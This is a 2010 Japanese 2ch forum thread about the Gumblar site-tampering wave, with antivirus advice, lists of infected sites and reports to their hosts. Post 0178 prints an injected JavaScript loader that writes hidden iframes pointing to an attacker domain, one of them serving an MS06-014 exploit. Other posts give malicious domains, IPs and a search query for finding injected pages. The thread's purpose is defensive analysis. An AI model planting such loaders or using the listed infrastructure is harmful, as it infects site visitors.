2010/03/13(土) 18:25:00Avastくらい入れてやれよ、ボランティアでw
0101名無しさん@お腹いっぱい。
2010/03/13(土) 18:27:23某福祉事務所のXP、SP2のまんまだし
当然Adobe関連はプレインスコのままだし
それよりなによりファイアウォールもアンチウィルスすら入ってねーし
で、そのPC使って障がい者相手のインターネット入門講座やるんだと
0102名無しさん@お腹いっぱい。
2010/03/13(土) 18:31:13とりあえずMSE入れたら重くて使い物にならんしorz
0103名無しさん@お腹いっぱい。
2010/03/13(土) 18:32:220104名無しさん@お腹いっぱい。
2010/03/13(土) 18:32:39ubuntuにシ十
0105名無しさん@お腹いっぱい。
2010/03/13(土) 18:44:35金をもらうためにPC+回線いれたのに
それ以上に金かけたくないってことだろ
こんなのがNPO法人になって金稼ぎしてるんだよww
0106名無しさん@お腹いっぱい。
2010/03/13(土) 18:53:090107名無しさん@お腹いっぱい。
2010/03/13(土) 19:44:27去年のネットでできる確定申告なんて、
新しいjava捨ててわざわざ古いバージョン入れないと動かなかった。
判明するのに子1時間悩まされた。
0108名無しさん@お腹いっぱい。
2010/03/13(土) 20:12:09勝手にされたら困る
0109名無しさん@お腹いっぱい。
2010/03/13(土) 20:13:250110名無しさん@お腹いっぱい。
2010/03/13(土) 20:30:06管理してないところは金がかからなくて業務に支障がなければ「勝手にどうぞ」てな感じ
保守とセキュリティ対策は業務妨害とコストとしてしか見ないのが見識のない組織の現実
0111名無しさん@お腹いっぱい。
2010/03/13(土) 20:31:37言葉足らずだった。
中途で役所のSEで入った友達の話。
あまりにも古い形式使っててセキュリティ的にヤバイって言って
議題に上げても一蹴。
『後から入ってきたくせに勝手にそんなことマンドクサそうなこと言い出すな!』
ってニュアンスだったそうな。
0112名無しさん@お腹いっぱい。
2010/03/13(土) 20:37:280113名無しさん@お腹いっぱい。
2010/03/13(土) 20:46:24ボランティアの人、あの警告音に驚くだろうなぁ・・・
0114名無しさん@お腹いっぱい。
2010/03/13(土) 20:47:400115名無しさん@お腹いっぱい。
2010/03/13(土) 20:51:37「WARNING! 40 infections found!!!'」の表示が出て他へ他へ進めません。
Internet ExplorerやOutlook Expressすら立ち上げることができず困っています。
PCはだいぶ前のNEC VR770Cという一体型で、今になって使用書を良く読むと
HDDに再セットアップ用データが入っていて再セットアップ用CD-ROMが作れた
様ですが、恥ずかしながらそれもしていません。
何とかこの哀れなPCを復活させる手はないでしょうか?
蛇足ながら、窓から投げ捨てるには高層マンションの25階で危険すぎるのです。
0116名無しさん@お腹いっぱい。
2010/03/13(土) 20:55:170117名無しさん@お腹いっぱい。
2010/03/13(土) 21:01:260118名無しさん@お腹いっぱい。
2010/03/13(土) 21:06:03/ ̄ ̄\
/ \ ____
|:::::: | / \
. |::::::::::: | / \
|:::::::: |/ -━- -━- \
. |:::::::::::::: } | (__人__) |
. ヽ:::::::::::::: } \ ` ⌒´ _/
ヽ:::::::::: ノ | \
/:::::::::::: く | | | |
-―――――|:::::::::::::::: \-―┴┴―――――┴┴――
/ ̄ ̄\
/ \ ____
|:::::: | / \
. |::::::::::: | / \
|:::::::: |/ -━- -━- \
. |:::::::::::::: } | (__人__) |
. ヽ:::::::::::::: } \ ` ⌒´ _/
ヽ:::::::::: ノ | \
/:::::::::::: く | | | |
-―――――|:::::::::::::::: \-―┴┴―――――┴┴――
/ ̄ ̄\
/ \ ____
| | / \
. | -━- -━-| / \
|::::: (__人__) |/ -━- -━- \
. |::::::::` ⌒´ } | (__人__) |
. ヽ:::::::::::: } \ ` ⌒´ _/
ヽ:::::::::: ノ | \
/:::::::::::: く | | | |
-―――――|:::::::::::::::: \-―┴┴―――――┴┴――
0119名無しさん@お腹いっぱい。
2010/03/13(土) 21:45:380120名無しさん@お腹いっぱい。
2010/03/13(土) 21:50:36NECに電話して型番とシリアルナンバー伝えて有料リカバリディスク買えばいいんじゃ
0121名無しさん@お腹いっぱい。
2010/03/13(土) 21:59:18お気に入りの型番なんだ
へぇ〜この板のアンチとおんなじジャン〜
0122名無しさん@お腹いっぱい。
2010/03/13(土) 22:01:21Hardwaremania BlackBox
://blackbox●hardwaremania●com/en/home
0123名無しさん@お腹いっぱい。
2010/03/13(土) 22:26:19/js/app.js
0124名無しさん@お腹いっぱい。
2010/03/13(土) 22:33:16Webシールドが遮ったなら大丈夫
0125名無しさん@お腹いっぱい。
2010/03/13(土) 22:56:23ドラクエノレベルアップの音
にでも変えとけw
0126名無しさん@お腹いっぱい。
2010/03/14(日) 10:07:04今、自分が遮断設定にしてるのは
67.212.81.67
67.215.237.98
67.215.238.194
67.215.246.34
91.215.156.74
91.215.156.75
91.215.156.76
94.76.250.73
94.229.65.174
193.104.12.20
195.24.76.250
210.51.166.228
216.45.48.66
0127名無しさん@お腹いっぱい。
2010/03/14(日) 10:23:180128名無しさん@お腹いっぱい。
2010/03/14(日) 10:27:040129名無しさん@お腹いっぱい。
2010/03/14(日) 10:43:340:基本的な対策(アップデート等)を行っておく ←必須
1:JAVAScriptをOFFしておく ←推奨
2:「:8080/」を含むURLを全て蹴る ←可能なら
0130名無しさん@お腹いっぱい。
2010/03/14(日) 10:48:02・ハチゼロハチゼロ?
・ハチマルハチマル?
・ハッセンハチジュウ?
0131名無しさん@お腹いっぱい。
2010/03/14(日) 10:49:491と2は不要
0132名無しさん@お腹いっぱい。
2010/03/14(日) 10:52:34flashとpdfリーダーアンインストールしろってこった
0133名無しさん@お腹いっぱい。
2010/03/14(日) 11:03:220134名無しさん@お腹いっぱい。
2010/03/14(日) 12:28:35http://tsushima.2ch.net/test/read.cgi/news/1268536865/
0135名無しさん@お腹いっぱい。
2010/03/14(日) 12:44:29>>91
0136名無しさん@お腹いっぱい。
2010/03/14(日) 12:45:59このサイトは改竄されてるわ
_,,.. -─-- 、,
,.::'´:::::::::::::::::::::::::::`::..、___ | _/
/::::::::/:::;:::::::i:::::::::;::::::::::::::く 〈7´ ピキーン
,'::::::::;'::::/:::/;ハ::::::;ハ:::::i:::::::ハ /
|::::::::|:::::|::/メ、|__/ |_ィ!、::::!::! ∧
‐ ─.|::::::::|:::::|7´ ∩ ∩Y|::|::| ─ヘ/ ':, /`ーw─'^ー ─ -
|::::::::|::::八. り . り 〈::」:」 ∨
|::::::::|:::::|"" _ ",ハ|
!::::::::|:::::|>,、 __,.. イ:::::|
,':::::::::|:::::|´ \_「`\:::|::::::| _________
./:::::::::::;\ト、 }_X_{ .〉、:::::| // /
/:::::::::::/ 、|\/ム`ァl/ \! // Tewinabook. /
/:::::::::::;' ´ ̄/>‐-、 ./ >‐// /
:::::::::::::/|. | | 、ン^'く::\ // /
──‐‐!、__|.」-‐'ーヘ‐'─'` ー//________/───
/l二二]O)_l王l_l三l__oOン
ヽ、_____ノ
0137名無しさん@お腹いっぱい。
2010/03/14(日) 13:24:250138名無しさん@お腹いっぱい。
2010/03/14(日) 13:29:460139名無しさん@お腹いっぱい。
2010/03/14(日) 15:53:530140コテハン
2010/03/14(日) 17:54:42//www●w-com●jp/
チェッカー3は未対応だが・・・作者殿はどこ?
0141コテハン
2010/03/14(日) 18:01:56↓
/1home/?S=D
/2company/?S=D
/2company/?D=A
/3business/?N=A
/5reference/?N=D
/5reference/?M=D
/5reference/?N=A
/5reference/?S=D
0142名無しさん@お腹いっぱい。
2010/03/14(日) 18:26:050143名無しさん@お腹いっぱい。
2010/03/14(日) 18:30:07AV-TEST.orgでいつも優秀で、ヒューリスティックも高性能なG Data、
AV-TESTでは二番目ながらかなり高性能なマカフィー、
AV-T(ryでは上位3位には入らないけど、ttp://honeywhales.com/では圧倒的に高性能なノートン
まぁぶっちゃけ新種の対応には厳しいからどれでもダメなんだろうけどw
一般的にはG Dataを選ぶんだろうけど、gredAVアクセラレータとは共存できないみたいだし、無難にマカフィーでも良いけど除外設定できないし、何よりhoneywhalesの結果が引っかかる
確かにhoneywhalesの地図にあるVirusTotalの結果を見るとマカフィーやG Dataでは検出できなくてノートンでは検出できるってものが多いんだよね
それに、AV-TEST.orgとか、AV Comparativesのレポートは裏でお金の取引をして順位を上げてるなんて噂もあるし(嘘だと思うけど
どっちを信用すれば良いのかな?
ここのスレには毎度お世話になってるから、今回も書き込んでみました。宜しければご回答お願いします
0144名無しさん@お腹いっぱい。
2010/03/14(日) 18:31:01そんなもんに神経使う前に日頃からの対策に神経を使ってください
0145143
2010/03/14(日) 18:38:00大丈夫既に各ソフトウェアのアップデートもしてるし、Firefox+Noscript+RequestPolicyでリダイレクトを防止して、AdblockPlusで8080ドメインをブロックしてる
0146名無しさん@お腹いっぱい。
2010/03/14(日) 18:39:04サイト改竄に対してセキュリティソフト依存は危険。
極端な話、穴をしっかり塞いでおけばノーガードでも感染しない。
0147143
2010/03/14(日) 18:46:21あーそういえば穴を塞いでおけば大丈夫だったね。基本を忘れてた
セキュリティソフト依存が危険な事はわかってる。
だけど、ゼロデイ状態とかになったときの為とか、ガンブラー以外のウィルスに対しても広く対応させる為とかで、補助的な意味でウィルス対策ソフトの乗り換えを考えてる
0148名無しさん@お腹いっぱい。
2010/03/14(日) 18:52:050149名無しさん@お腹いっぱい。
2010/03/14(日) 18:52:10すべてアウトでいいの?
.>>5 で 反応しないんだけど
0150名無しさん@お腹いっぱい。
2010/03/14(日) 18:53:180151名無しさん@お腹いっぱい。
2010/03/14(日) 19:08:06無害だろw
0152名無しさん@お腹いっぱい。
2010/03/14(日) 19:11:12Possible_Gumb-3 と 反応したから
確かめてみたかった
0153名無しさん@お腹いっぱい。
2010/03/14(日) 19:25:41ゼロデイならほとんどの場合セキュソフトのヒューリスティックに引っかかるかどうかだから
下手すると乗り換え前のソフトだと検出したが乗り換え後のソフトだとスルーと言うこともありえるぞ
0154名無しさん@お腹いっぱい。
2010/03/14(日) 19:36:25ある程度わかってる人なら乗り換えても問題はないと思うけど
そうじゃない人には慣れてるの使っとけといってる
実際そこまで大差ないし
今変えたとして直後にそれが調子悪くなったらまた変えるの?
毎回なんかあるごとに乗り換えてたらキリがなくね?
0155名無しさん@お腹いっぱい。
2010/03/14(日) 19:42:57ろくなレスが付かないので同じ質問をOKEaveに書き込んだら、たちどころに適切な
役立つ投稿が何通もはいりました。
0156名無しさん@お腹いっぱい。
2010/03/14(日) 19:46:110157名無しさん@お腹いっぱい。
2010/03/14(日) 19:50:01>>115はスレチ。
だから誰もマトモに答えなかった。以上。
0158名無しさん@お腹いっぱい。
2010/03/14(日) 19:54:530159名無しさん@お腹いっぱい。
2010/03/14(日) 21:36:05あーそっかwヒューリスティックになるんだよなw
確かノートンとマカフィーは・・・微妙だったような
前入れてたのはAntiVirとMSEだったからなかなかの性能だったよなー
親がノートン使ってて、3台までインストール可能ってなってたからさっき入れてみたけど、調べてみたらオンデマンドもヒューリスティックもAntiVirよりも下だったな@AVComparatives
>>154
大差ないのか・・・orz
確かにキリないなぁ。どうしよう
使い慣れてるのかー。だったらフリーのになるのかなぁ
確かに、ずべてのウィルスを検出できる製品なんてないし、ウィルスも日々大量生産されてるわけだし、AV-TESTとかはあくまで一例であって、実際はそんなに大差ないのかもしれないな
とりあえずテスト機関のレポートにあまりとらわれず、よく考えてみる事にする。答えてくれた人、ありがとうございます。
0160143
2010/03/14(日) 21:37:210161名無しさん@お腹いっぱい。
2010/03/14(日) 22:00:02どんだけ語るんだよ
0162名無しさん@お腹いっぱい。
2010/03/14(日) 22:34:26埋め込みに失敗(?)とかコメントアウトされてるとかで
実際には機能してないのもある
0163名無しさん@お腹いっぱい。
2010/03/15(月) 07:56:390164名無しさん@お腹いっぱい。
2010/03/15(月) 08:06:120165名無しさん@お腹いっぱい。
2010/03/15(月) 15:54:120166コテハン
2010/03/15(月) 16:19:38ic-isweb●hp●infoseek●co●jp/
isay●livedoor●biz/ ←!
<!--トロイを絶賛配布中!(無料)-->
www●plci●net/egf/
<!--更新履歴(不要の場合はここから削除)-->
<div class="module-archives module">
<div class="module-header"
<script>var (以下略
・・・コードは必要なんでしょうカネ?
0167名無しさん@お腹いっぱい。
2010/03/15(月) 16:24:440168八頭 ◆YAGApwSaEw
2010/03/16(火) 00:33:10腕試しにフランスドメイン(fr)洗ってみてくれ
0170八頭 ◆YAGApwSaEw
2010/03/16(火) 01:51:56ここんとこずっと仏が被害で突出しているみたい
0171八頭 ◆YAGApwSaEw
2010/03/16(火) 01:57:07国名略号 and 国名ドメイン早見表
ttp://www1.coralnet.or.jp/kusuto/Data-Room/country-codes.html
EU諸国 マップ
ttp://www.d.umn.edu/cla/faculty/troufs/anth1095/images/map_eu_countries_europe.jpg
0172名無しさん@お腹いっぱい。
2010/03/16(火) 02:26:08何でわざわざモザイクなんてかけるんだ?
0173名無しさん@お腹いっぱい。
2010/03/16(火) 03:01:090174名無しさん@お腹いっぱい。
2010/03/16(火) 03:25:14www●ebookjapan●jp/ebj/title/10429.html
0175コテハン
2010/03/16(火) 03:35:38けんさくわーど
"new String();" "new Date();" "new Array();" -JAVA -JAVAScript site:.fr
ぐーぐる先生
ttp://www.google.co.jp/search?q=%22new+String%28%22+%22new+Date%28%22
+%22new+Array%28%22+-JAVA+-JAVAScript+site%3A.fr&btnG=%E6%A4%9C%E7%B4
%A2&hl=ja&lr=&sa=2
びんぐ
ttp://www.bing.com/search?q=%22new+String%28%29%3B%22+%22new+Date%28%
29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript+site%3A.fr&go=&fo
rm=QBLH&filt=all
禿(やふー)
ttp://search.yahoo.co.jp/search?p=%22new+String%28%29%3B%22+%22new+Da
te%28%29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript+site%3A.fr&
ei=UTF-8&fr=top_ga1_sa&x=wrt
0176名無しさん@お腹いっぱい。
2010/03/16(火) 03:43:34それ、スクリプトが埋まってるって意味で言ってる?
0177コテハン
2010/03/16(火) 03:44:30ずいぶんアレな仕込み方だが・・・
//w●robints●us/us●js
↓
//w●robints●us/cnzz●html
//w●robints●us/614●html
//w●robints●us/jf●html
//w●robints●us/jg●html
この先はシラネ
0178名無しさん@お腹いっぱい。
2010/03/16(火) 07:11:05http://w●robints.us/us.js
4発の内訳
try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w|\W)*\>/,"");
if (document.cookie!='__m'){
document.cookie='__m;expires='+(new Date(((new Date()).getTime()+600000)).toGMTString())+';';
document.write("<iframe src=http://w●robints.us/cnzz.html width=0 height=0></iframe>");
document.write("<iframe src=http://w●robints.us/614.html width=0 height=0></iframe>");
document.write("<iframe src=http://w●robints.us/jf.html width=0 height=0></iframe>");
document.write("<iframe src=http://w●robints.us/jg.html width=0 height=0></iframe>");
}}
飛ばされる先は
<iframe src=hXXp://w●robints●us/cnzz●html width=0 height=0>
</iframe>
↓
<div style=display:none>
<script src="hXXp://s10●cnzz●com/stat●php?id=1990191&web_id=1990191" language="JavaScript">
</script>
</div>
マイクロソフトのデータから総計としては少ないがこの御時世に未だMS06-014エクスプロイト。614.html
ttp://img.microsoft.com/japan/security/images/contents/SirV7MalType.png
自国で撒くと足がつきやすいから他国に撒く
どうせ撒くなら足がつきにくい国はどこか?
答え.ウイルス黒人街中国ロシア
でもどうして未だにMS06-014なのか?614.html
0179名無しさん@お腹いっぱい。
2010/03/16(火) 08:02:41http://www.malwarebytes.org/mbam.php
0180名無しさん@お腹いっぱい。
2010/03/16(火) 10:28:14ツイッターのアカウントあるけど、こっちも凸ってみる?
0181名無しさん@お腹いっぱい。
2010/03/16(火) 10:28:47毎週更新されて楽しかったのに。
0182名無しさん@お腹いっぱい。
2010/03/16(火) 12:21:30戦略的撤退(休眠)のような気がする
0183名無しさん@お腹いっぱい。
2010/03/16(火) 14:54:43マトモなとこだとホッとするな。
0184名無しさん@お腹いっぱい。
2010/03/16(火) 15:20:57メンテになってるな
0185名無しさん@お腹いっぱい。
2010/03/16(火) 19:44:58「キャー痴漢!」
なんてリスク背負いたくないしな
0186名無しさん@お腹いっぱい。
2010/03/16(火) 19:58:40最新版を直DLできるURLとかないですかね?(以前は、ここをクリックで手動DL可能だった)
0187名無しさん@お腹いっぱい。
2010/03/16(火) 20:23:15最新版ならいつもこのアドレス
ttp://fpdownload.adobe.com/get/flashplayer/current/install_flash_player_ax.exe
ttp://fpdownload.adobe.com/get/flashplayer/current/install_flash_player.exe
0188名無しさん@お腹いっぱい。
2010/03/16(火) 20:30:15ありがとう
しかし・・少し前までは通常ページからダウンロードを選択→ブラウザのブロック機能で
インストーラの発動を止める→ここをクリックで手動DLが可能だったのに何というせこさ・・
0189名無しさん@お腹いっぱい。
2010/03/16(火) 22:09:190190名無しさん@お腹いっぱい。
2010/03/16(火) 23:03:42「ウイルス感染確認のお願い」のページで、なぜアバスト!を勧めてるのかは不明だけど。
>>184
トップページではちゃんと「ウイルス感染の連絡があった」と記述されてた。
サブページはメンテって記述。
マトモな対応だ。これが普通だよな。
0191名無しさん@お腹いっぱい。
2010/03/16(火) 23:07:18アバスト!は無料だし今回genoウィルスにまじめに取り組んでる少ないウィルス対策ソフトだからじゃないかなと推測
0192名無しさん@お腹いっぱい。
2010/03/16(火) 23:08:16puremis●net/
mrtb●puremis●net/
jmt●puremis●net/
随分ほったらかしにしてるみたい。
0193名無しさん@お腹いっぱい。
2010/03/17(水) 00:22:16無害だからね
0194名無しさん@お腹いっぱい。
2010/03/17(水) 01:22:17おちゅ。
エックスサーバーにつーほーしますた。
>>193
?
0195名無しさん@お腹いっぱい。
2010/03/17(水) 04:14:40■アクセス注意!
ttp://74.125.153.132/search?q=cache:MVuDVrdidDQJ:www.ebookjapan.jp/ebj/tag_genre.asp
<meta name="Keywords" content="〜〜中略〜〜
,貸本マンガ<Script src=hXXp://w●robints●us/us●js></Script>" />
変な所に仕込んであるしw
0196名無しさん@お腹いっぱい。
2010/03/17(水) 04:30:43それともアレかあえてひっかける釣りか?
0197名無しさん@お腹いっぱい。
2010/03/17(水) 07:27:58http://www.yomiuri.co.jp/national/news/20100317-OYT1T00021.htm
インターネット広告会社「サイバーエージェント」(東京都渋谷区)が運営するブログサイト「アメーバブログ(アメブロ)」を
利用していた芸能人のIDとパスワードがネット上に流出した事件で、警視庁が、大手芸能事務所「ホリプロ」(目黒区)
元契約社員岡田邦彦容疑者(30)を不正アクセス禁止法違反の疑いで逮捕していたことがわかった。
逮捕は3月13日。
捜査関係者によると、岡田容疑者は今年1月1日未明、タレントの藤本美貴さんのブログに、藤本さんのIDとパスワードを
使って不正に侵入し、芸能人445人分のIDとパスワードなどが記載された個人情報リストを張り付けた疑い。その結果、
リストは藤本さんのブログを閲覧した人がクリックすると、ダウンロードできるようになっていた。
このリストはサイバー社の内部文書。同社社員が日頃から仕事上の付き合いのあった岡田容疑者に誤ってメールしたのが原因だった。
アメブロは日記形式のホームページ。サイバー社によると、事件後、リストの芸能人らのパスワードは変更されており、流出による被害は確認されていない。
(2010年3月17日03時03分 読売新聞)
0198名無しさん@お腹いっぱい。
2010/03/17(水) 08:52:54ホリプロの元社員も悪いけどメールで送ったサイバーの社員も罰せられるべきだよな
0199名無しさん@お腹いっぱい。
2010/03/17(水) 09:29:440200名無しさん@お腹いっぱい。
2010/03/17(水) 10:20:14ゲイツは本当に便利なチートマシンを作ってくれたぜ
0201名無しさん@お腹いっぱい。
2010/03/17(水) 10:25:01パスワード送られてきたらログインしたくなっちゃうかもな
俺もミキティのパスが送られてきたらログインしちゃったかもしれん
でもリストをブログに貼り付けることはしないわな
0202名無しさん@お腹いっぱい。
2010/03/17(水) 11:12:49すげーいい加減なexcel管理だなぁと思った
もっときれいに管理してやれよ
あと、芸能人なのに自分の誕生日パスワードにするのはやめろ
公開されてるのに無用心すぎるだろw
0203名無しさん@お腹いっぱい。
2010/03/17(水) 11:34:32日常的にずさんな管理しているんだろう。
0204名無しさん@お腹いっぱい。
2010/03/17(水) 13:19:05以下の順番にインストールする。
avast! Free Antivirus のダウンロード (日本語公式ページ)
http://www.avast.com/ja-jp/free-antivirus-download
ウイルス、スパイウェア、マルウェア対策 | Microsoft Security Essentials
http://www.microsoft.com/security_essentials/
gred Anti Virus アクセラレータ | ダウンロード
https://www.gred.jp/avx/download.html
(ちなみに併用使用でも問題はありません)
0205名無しさん@お腹いっぱい。
2010/03/17(水) 13:26:56実験モルモットな組み合わせだなw
0206名無しさん@お腹いっぱい。
2010/03/17(水) 13:35:10併用は監視の重複で権利の奪い合いになってスルーが起きやすくなるからかえって性能が落ちる
いろんなとこにコピペしまくってるとこ見ると被害者を増やしたいのかね
0207名無しさん@お腹いっぱい。
2010/03/17(水) 13:37:13avast!++gred AntiVirus
MSE+gred AntiVirus
こうだろ?
0208名無しさん@お腹いっぱい。
2010/03/17(水) 14:10:55この組み合わせは良いぞ
0209名無しさん@お腹いっぱい。
2010/03/17(水) 14:22:230210名無しさん@お腹いっぱい。
2010/03/17(水) 14:36:160211名無しさん@お腹いっぱい。
2010/03/17(水) 15:45:550212名無しさん@お腹いっぱい。
2010/03/17(水) 16:24:540213名無しさん@お腹いっぱい。
2010/03/17(水) 16:27:210214名無しさん@お腹いっぱい。
2010/03/17(水) 18:34:30あ?ルナスケープなめてんのか?
0215名無しさん@お腹いっぱい。
2010/03/17(水) 20:01:130216名無しさん@お腹いっぱい。
2010/03/17(水) 21:10:290217名無しさん@お腹いっぱい。
2010/03/17(水) 21:36:140218名無しさん@お腹いっぱい。
2010/03/17(水) 23:18:14Gumblar対策だけならReaderのままでもブラウザから自動起動されないようにすればいいだけだろ
0219名無しさん@お腹いっぱい。
2010/03/18(木) 12:28:44なる
>>217
断言ってお前馬鹿か?
0220名無しさん@お腹いっぱい。
2010/03/18(木) 12:57:330221名無しさん@お腹いっぱい。
2010/03/18(木) 13:17:57>>216に回答すりゃ、それは断言になるだろ
なに?よくわからないあいまいな答えが欲しかったの?
0222名無しさん@お腹いっぱい。
2010/03/18(木) 15:00:52「どちらともいえない」が一番しっくりくるに決まってるべ。
0223名無しさん@お腹いっぱい。
2010/03/18(木) 17:46:580224名無しさん@お腹いっぱい。
2010/03/18(木) 18:11:35前のバージョンだってJavaScript無効にすればいいだけ
他社製にする必要もない
0225名無しさん@お腹いっぱい。
2010/03/18(木) 18:28:17今まで検出していたavast!がスルーするようになった
VTの結果もほとんど: 3/42 (7.15%)
mogulclub●com/BANDS_AND_GIGS/index_CIARA●html
s1●shard●jp/dreaming/
s1●shard●jp/dreaming/mitubishiucar/index●html
www●avis●ne●jp/~muranaka/
www●hct●zaq●ne●jp/cpacs503/
www●i-paradise5●jp/~simple/otona/index●php
www●kadoma-c●com
www●kikuyakikai●com
www●sesica●co●jp
ttp://www.virustotal.com/jp/analisis/eaa158057d418417724f23fc8d9ee0b13550f5f52b409b3b373eb6ccdb4db791-1268903269
ttp://www.virustotal.com/jp/analisis/eab4a78a1dea07c29183259d476ff1646e04c0a9b3d9f50e13a30a9939431cf1-1268903344
ttp://www.virustotal.com/jp/analisis/5e3172387fe0932c3fcf9409f63c906e944283d2e7a453c8783ee4b13ef891e7-1268903385
ttp://www.virustotal.com/jp/analisis/6fc63e268e8bd0a9e2a385d3e7b833d1fa3640c6ca41bc758a7541dc7929d03c-1268901812
ttp://www.virustotal.com/jp/analisis/08b65c9a24c03b21cbf0ac849a3446511d4fab346526a98241077af45107e52f-1268903427
ttp://www.virustotal.com/jp/analisis/65eb3f33b66cfd3fc7745502c8c8275e632e66227db73126dbc624cc274f4c56-1268903475
ttp://www.virustotal.com/jp/analisis/3e77086644c08945bcd61ed7158702f6e31cf24e604bafd6d57d688176a781a5-1268903551
ttp://www.virustotal.com/jp/analisis/8f933e2e964ee8f32c5b30fff6f90dd00a890844f58195c6422de2a8c923c158-1268903603
ttp://www.virustotal.com/jp/analisis/02aa30e73bfa773f56eb0aedd94e7d0404f42a45c5ae6daf0d4e7211ac5a0b75-1268903654
0226名無しさん@お腹いっぱい。
2010/03/18(木) 19:12:20最新版だろうがJavaScriptオフだろうがまだまだ山ほど脆弱性が残ってそうなのが怖いんだよな
0227名無しさん@お腹いっぱい。
2010/03/18(木) 19:46:04403になっとるな。本に紹介されたばっかりなのにね。
これ、お詫び無しパターンだぜ。
0228名無しさん@お腹いっぱい。
2010/03/18(木) 20:05:11s1●shard●jp/dreaming/
電凸完了
0229名無しさん@お腹いっぱい。
2010/03/18(木) 20:25:41www●avis●ne●jp/~muranaka/
電凸完了
0230名無しさん@お腹いっぱい。
2010/03/18(木) 20:50:40www●hct●zaq●ne●jp/cpacs503/
電凸完了
0231名無しさん@お腹いっぱい。
2010/03/18(木) 20:53:270232名無しさん@お腹いっぱい。
2010/03/18(木) 21:15:20e-risingsun●net
faac3020●cpinet●jp/
www4●ocn●ne●jp/~ikl/member/index●htm
www●mfreep●com →スクリプトはあるがaguseでは外部と接続するオブジェクトを検出しなかった
VTの結果は 3〜4/42
ttp://www.virustotal.com/jp/analisis/1e78d4c8d6fca221474295925a83a578555088946bc69e6eb3d8cd604b50659b-1268913734
ttp://www.virustotal.com/jp/analisis/9df24eb6059480edf3b33e5483e58d3f85bcb1a10ff5a62a09b9626632edbef6-1268913822
ttp://www.virustotal.com/jp/analisis/672dae1c7819f7ffb97697bd689eadb41352c05a3d1fa90f19c0cedf0315a6ef-1268913915
ttp://www.virustotal.com/jp/analisis/b83677038bf352b34be91756d1ec4da1d555ce1b47b9b4842246969721bff227-1268913993
0233名無しさん@お腹いっぱい。
2010/03/19(金) 00:02:01挿入した不要な文字を函数で削除するタイプ
主要部はこれまでの応用だけど…
BuyTheBlenderma●ru:8080
404 Not Found
404 Not Found
YourSuperPool●ru:8080
SuperSuperMall●ru:8080
TheBlenderTutorial●ru:8080
TheBlenderTutorial●ru:8080
YourSuperPool●ru:8080
ExcellentBlender●ru:8080
どれもドメイン名に大文字が入ってるんだけど、
ひょっとして、これだけで検出できなくなるとか?
0234名無しさん@お腹いっぱい。
2010/03/19(金) 00:15:49これも大文字入り
SuperSuperMall●ru
TheBlenderTv●ru
BuyTheBlender●ru
YourSuperPool●ru
> スクリプトはあるがaguseでは外部と接続するオブジェクトを検出しなかった
どれも、この5 IPのラウンドロピンですね
91●121●7●26
91●121●24●139
91●121●134●58
91●121●137●124
91●121●163●215
0235名無しさん@お腹いっぱい。
2010/03/19(金) 08:53:540236名無しさん@お腹いっぱい。
2010/03/19(金) 10:12:22descr: OVH ISP
descr: Paris, France
origin: AS16276
ここに電凸できれば、超男前だな
0237名無しさん@お腹いっぱい。
2010/03/19(金) 10:14:01感染している事を知っているにもかかわらず放置
電話しても担当者はいない、ここは会社ではなく個人の家
などと訳のわからない対応を行い、会社としての責任を果たしていない。
0238名無しさん@お腹いっぱい。
2010/03/19(金) 10:17:570239名無しさん@お腹いっぱい。
2010/03/19(金) 10:43:20修復したけど感染告知無し。
こういう宿は泊まっても不快な思いをするだけだろうな。
0240名無しさん@お腹いっぱい。
2010/03/19(金) 15:11:31//www●aquaview●jp/q_a/index●html
0241名無しさん@お腹いっぱい。
2010/03/19(金) 16:25:110242名無しさん@お腹いっぱい。
2010/03/19(金) 16:30:220243名無しさん@お腹いっぱい。
2010/03/19(金) 16:58:39avast、AVG、カスペ、ノートン、G-DATA辺り?
0244名無しさん@お腹いっぱい。
2010/03/19(金) 17:17:57確認の為に電凸してみました。ワロタww
GMOインターネット株式会社に凸。。
んで、完了。
0245名無しさん@お腹いっぱい。
2010/03/19(金) 18:06:58亀レスで申し訳ない
それって、そもそもスルーされて監視が出来ないってことだよね?
例えば3つアンチウィルスを入れてたとしてそのうち一つでしか検出出来ないウィルスだとする
その唯一検出できる製品がスルーして、取りこぼすっていう可能性もある?
検出のされにくさとか関係ないんだよね?
0246名無しさん@お腹いっぱい。
2010/03/19(金) 18:10:37www●i-paradise5●jp/~simple/otona/index●php → 電話が繋がらないのでパス
www●kadoma-c●com → 上流に凸、既に別の有志より連絡が有ったとの事
www●kikuyakikai●com → >>244
www●sesica●co●jp → 上流に凸完了
0247名無しさん@お腹いっぱい。
2010/03/19(金) 18:15:390248名無しさん@お腹いっぱい。
2010/03/19(金) 18:42:47AvastとMSEの組み合わせで起きるかは知らんが
昔流行ったセキュリティブログで紹介された
Avast(常駐ガードオフでシールドはオン)+AntiVirでダブルエンジン()というやつでは
検出できずにスルーしたという話があった気がする
0249名無しさん@お腹いっぱい。
2010/03/20(土) 12:26:240250名無しさん@お腹いっぱい。
2010/03/20(土) 12:36:22ここも電話してもやる気のない対応
これが社長なんだから笑う
0251名無しさん@お腹いっぱい。
2010/03/20(土) 12:40:360252名無しさん@お腹いっぱい。
2010/03/20(土) 12:47:20www●e-kudamono●co●jp
0253名無しさん@お腹いっぱい。
2010/03/20(土) 13:30:140254名無しさん@お腹いっぱい。
2010/03/20(土) 14:10:19味噌県の人間なんてそんなもんだ
0255orz=3
2010/03/20(土) 14:25:00kallook●com
www●trajal●net/PR/index●html
--
www●bestofunder●com ←(笑)
0256名無しさん@お腹いっぱい。
2010/03/20(土) 14:27:46コレはレンタルサーバかな?
全滅してる。
http://www.google.com/search?num=50&hl=ja&q=twentyfour-24.com&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja&aq=f&aqi=&aql=&oq=&gs_rfai=
0257名無しさん@お腹いっぱい。
2010/03/20(土) 14:33:17レン鯖じゃないよ。
誰かろりぽ通報頼んだ
0258名無しさん@お腹いっぱい。
2010/03/20(土) 15:54:15まじだwww
全部にこのサイトはコンピューターに(ry
0259名無しさん@お腹いっぱい。
2010/03/20(土) 16:55:360260名無しさん@お腹いっぱい。
2010/03/20(土) 16:56:18定番xrea
0261名無しさん@お腹いっぱい。
2010/03/20(土) 18:49:26Google先生もいっそのこと検索結果から消してしまえばいいのに。
0262名無しさん@お腹いっぱい。
2010/03/20(土) 21:24:50ふつくしい…
0263名無しさん@お腹いっぱい。
